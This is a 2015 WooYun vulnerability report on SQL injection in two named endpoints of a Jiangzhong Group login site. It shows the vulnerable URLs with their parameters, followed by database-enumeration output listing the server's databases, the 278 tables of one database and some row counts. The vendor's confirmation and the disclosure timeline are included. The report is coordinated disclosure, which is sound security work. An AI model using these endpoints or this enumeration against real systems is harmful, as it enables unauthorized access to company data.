当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0126801

漏洞标题:江中集团某站点注入

相关厂商:江中集团

漏洞作者: ago

提交时间:2015-07-15 10:50

修复时间:2015-08-29 13:26

公开时间:2015-08-29 13:26

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-15: 细节已通知厂商并且等待厂商处理中
2015-07-15: 厂商已经确认,细节仅向厂商公开
2015-07-25: 细节向核心白帽子及相关领域专家公开
2015-08-04: 细节向普通白帽子公开
2015-08-14: 细节向实习白帽子公开
2015-08-29: 细节向公众公开

简要描述:

。。

详细说明:

http://login.jzjt.com/jznw/zwMore.jsp?comp=11 存在sql注入漏洞
http://login.jzjt.com/contents/oaBBS/13.jsp?id=153 存在sql注入漏洞
available databases [10]:
[*] JzWeb
[*] lumigent
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] YC_SmartCard
[*] ysbx_zj
Database: JzWeb
[278 tables]
+-------------------------+
| dbo.ACNP50YM |
| dbo.ACNP50YY$ |
| dbo.ACNP50_GF |
| dbo.APL_gf |
| dbo.BBNAME |
| dbo.BBTYPE |
| dbo.CALC_METHODS |
| dbo.Cust_Check |
| dbo.Cust_State |
| dbo.DZ |
| dbo.FImaster_audit |
| dbo.Group_Tx |
| dbo.IndaList |
| dbo.Indagate |
| dbo.M_data |
| dbo.M_type |
| dbo.MagazineInfo |
| dbo.MagazineMesInfo |
| dbo.MessageInfo |
| dbo.NewsInfo |
| dbo.ProductInfo |
| dbo.ProductSortInfo |
| dbo.REPDIM |
| dbo.REP_101a |
| dbo.REP_101b |
| dbo.REP_102a |
| dbo.REP_102b |
| dbo.REP_103 |
| dbo.REP_104 |
| dbo.REP_105 |
| dbo.REP_106 |
| dbo.REP_107 |
| dbo.REP_108 |
| dbo.REP_109 |
| dbo.REP_301 |
| dbo.REP_401 |
| dbo.REP_402 |
| dbo.REP_403a |
| dbo.REP_403b |
| dbo.REP_403c |
| dbo.REP_404 |
| dbo.REP_405 |
| dbo.REP_406a |
| dbo.REP_406b |
| dbo.REP_406c |
| dbo.REP_407a |
| dbo.REP_407b |
| dbo.REP_408a |
| dbo.REP_408b |
| dbo.REP_409a |
| dbo.REP_409b |
| dbo.REP_410 |
| dbo.REP_411 |
| dbo.REP_412 |
| dbo.REP_413a |
| dbo.REP_413b |
| dbo.REP_414 |
| dbo.REP_415 |
| dbo.REP_416 |
| dbo.Results |
| dbo.Resume |
| dbo.RetainInfo |
| dbo.Route |
| dbo.SectionHeadInfo |
| dbo.Sheet1$ |
| dbo.Speciality |
| dbo.SprayInfo |
| dbo.StkRept |
| dbo.Storeroom |
| dbo.TEL_QRY |
| dbo.Teac |
| dbo.UnderlingInfo |
| dbo.UserInfo |
| dbo.VIEW1 |
| dbo.VIEW_phb_gh |
| dbo.VIEW_phb_ysz |
| dbo.[JzWeb.D99_Tmp] |
| dbo.[结果] |
| dbo.acct_data |
| dbo.acount |
| dbo.adrc |
| dbo.ads_query |
| dbo.affair_Tx |
| dbo.afr |
| dbo.afr040921 |
| dbo.afr_leave |
| dbo.afr_log |
| dbo.alert |
| dbo.app |
| dbo.app_log |
| dbo.apply_inc |
| dbo.attach |
| dbo.auth_apply |
| dbo.auth_level |
| dbo.bbs_auth |
| dbo.bbs_class |
| dbo.bbs_reply |
| dbo.bbs_topic |
| dbo.bill |
| dbo.bill_log |
| dbo.bstatus |
| dbo.bud_log |
| dbo.bud_std |
| dbo.bud_std040921 |
| dbo.bud_std1 |
| dbo.bud_std2 |
| dbo.bud_stdb |
| dbo.bys |
| dbo.bys_log |
| dbo.card_grp |
| dbo.card_info |
| dbo.cg |
| dbo.cg_log |
| dbo.cl |
| dbo.cl040921 |
| dbo.cl_detail |
| dbo.cl_leave |
| dbo.cl_log |
| dbo.clbz |
| dbo.comm |
| dbo.comp_addr |
| dbo.comp_audit |
| dbo.company |
| dbo.company1 |
| dbo.cust_log |
| dbo.customerdata |
| dbo.cwb_audit |
| dbo.data_amh |
| dbo.data_aph |
| dbo.data_avm |
| dbo.data_iim |
| dbo.data_ith |
| dbo.data_qat |
| dbo.data_rar |
| dbo.data_rar1 |
| dbo.data_rcm |
| dbo.data_zwhz |
| dbo.date |
| dbo.dep |
| dbo.dep1 |
| dbo.dep_auth |
| dbo.dep_bak |
| dbo.dep_table |
| dbo.diaocha |
| dbo.diaocha_110104bjspb |
| dbo.dist |
| dbo.doc_file_info |
| dbo.doc_info |
| dbo.doc_path |
| dbo.doc_popedom |
| dbo.doc_receive |
| dbo.doc_title |
| dbo.doc_type |
| dbo.doctor |
| dbo.dtproperties |
| dbo.ecl |
| dbo.erp_audit |
| dbo.erp_audit1 |
| dbo.func |
| dbo.fz_content |
| dbo.fz_name |
| dbo.gg |
| dbo.gh |
| dbo.group |
| dbo.gz |
| dbo.hospital |
| dbo.hr |
| dbo.hs |
| dbo.idea_apply |
| dbo.indaHis |
| dbo.indicator |
| dbo.indicator1 |
| dbo.info |
| dbo.inv |
| dbo.kna1 |
| dbo.line |
| dbo.linkBook |
| dbo.lj |
| dbo.ljl_manager |
| dbo.lk2 |
| dbo.mail_sign_info |
| dbo.mark_id |
| dbo.market |
| dbo.mas_data_auth |
| dbo.mas_data_route |
| dbo.month |
| dbo.office |
| dbo.pact |
| dbo.pangolin_test_table |
| dbo.path |
| dbo.policy |
| dbo.prod |
| dbo.product1 |
| dbo.product2 |
| dbo.product3 |
| dbo.product4 |
| dbo.product5 |
| dbo.rarx |
| dbo.rc_address |
| dbo.rc_sch |
| dbo.rc_todo |
| dbo.rc_type |
| dbo.rck |
| dbo.rcm |
| dbo.rcm_crm |
| dbo.reason |
| dbo.rs_flbxb |
| dbo.rs_gzll |
| dbo.rs_kpb |
| dbo.rs_kqb |
| dbo.rs_kqfzr |
| dbo.rs_ldhtb |
| dbo.rs_pxfk |
| dbo.rs_pxjg |
| dbo.rs_pxjh |
| dbo.rs_pxjl |
| dbo.rs_pxll |
| dbo.rs_pxs |
| dbo.rs_rcbyk |
| dbo.rs_rsdab |
| dbo.rs_sjkwhb |
| dbo.rs_syqfkb |
| dbo.rs_wsdjb |
| dbo.rs_yglgyjb |
| dbo.rs_yrsqb |
| dbo.rs_ysjf |
| dbo.rs_zwsqrllb |
| dbo.school_book |
| dbo.school_class |
| dbo.school_index |
| dbo.scxe |
| dbo.seller_log |
| dbo.send |
| dbo.sil |
| dbo.sjldc_jsp |
| dbo.status_apply |
| dbo.statusname |
| dbo.sub |
| dbo.sysconstraints |
| dbo.syssegments |
| dbo.temp_usr |
| dbo.tmp_usr |
| dbo.usr |
| dbo.usr1 |
| dbo.usr_dep |
| dbo.usr_func |
| dbo.usr_inf |
| dbo.usr_level |
| dbo.usr_mail_info |
| dbo.usr_roll |
| dbo.usr_std_level |
| dbo.usr_table |
| dbo.v_afr_log |
| dbo.v_cgdetail |
| dbo.vaframt |
| dbo.vendor_data |
| dbo.wjdc_jsp |
| dbo.wlb_audit |
| dbo.wldc |
| dbo.wldc2013 |
| dbo.workflow |
| dbo.x |
| dbo.xjlZB |
| dbo.xjllb |
| dbo.xjllb_qm |
| dbo.xyz |
| dbo.year |
| dbo.yf |
| dbo.yfk |
| dbo.yfk_log |
| dbo.ysbx_leave |
| dbo.ysbx_xm |
| dbo.zcb_audit |
| dbo.zhibiao |
| dbo.zj |
| dbo.zj_func |
| dbo.zj_log |
| dbo.zlb_audit |
+-------------------------+

漏洞证明:

Database: msdb
+-----------------------+---------+
| Table | Entries |
+-----------------------+---------+
| dbo.backupfile | 2640 |
| dbo.backupmediafamily | 1320 |
| dbo.backupmediaset | 1320 |
| dbo.backupset | 1320 |
| dbo.sysconstraints | 101 |
| dbo.syscategories | 19 |
| dbo.syssegments | 3 |
+-----------------------+---------+

修复方案:

过滤

版权声明:转载请注明来源 ago@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2015-07-15 13:25

厂商回复:

非常感谢,已定位问题,并安排专人负责修复问题

最新状态:

暂无


漏洞评价:

评论